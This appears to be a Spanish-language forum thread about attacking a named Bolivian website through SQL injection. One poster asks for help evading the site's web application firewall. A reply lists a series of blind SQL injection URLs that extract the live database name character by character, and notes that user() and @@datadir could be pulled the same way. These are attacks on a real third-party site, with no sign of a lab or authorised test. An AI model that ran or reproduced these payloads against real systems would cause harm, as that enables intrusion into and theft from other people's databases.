saludos comunidad
me encontre con esta web, http://www.pieb.com.bo/sipieb_nota.php?idn=8661
order by 27--
la cual eh probado una serie de tecnicas de bypass para evadir el WAF pero hasta el momento no logro evadir si alguien puede aportar ayuda para descubrir como evadir .
gracias...
Estuve realizando testeos y el waf esta muy bien configurado por lo que se me hizo imposible evadir las restricciones, salvo que la unica informacion que pude obtener fue el nombre de la db con la siguiente consulta, utilizando la tecnica mysql blind, ya que no requeria de ciertas sentencias que se encuentran en la blacklist del firewall.
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),1,1))=112# ->p
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),2,1))=105# -> i
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),3,1))=101# -> e
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),4,1))=98# -> b
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),5,1))=100# -> d
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),6,1))=111# -> o
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),7,1))=109# -> m
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),8,1))=105# -> i
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),9,1))=95# -> _
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),10,1))=112# -> p
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),11,1))=105# -> i
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),12,1))=101# -> e
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),13,1))=98# ->b
Database: piebdomi_pieb
asi mismo se podria obtener informacion de funciones como:user(), @@datadir, etc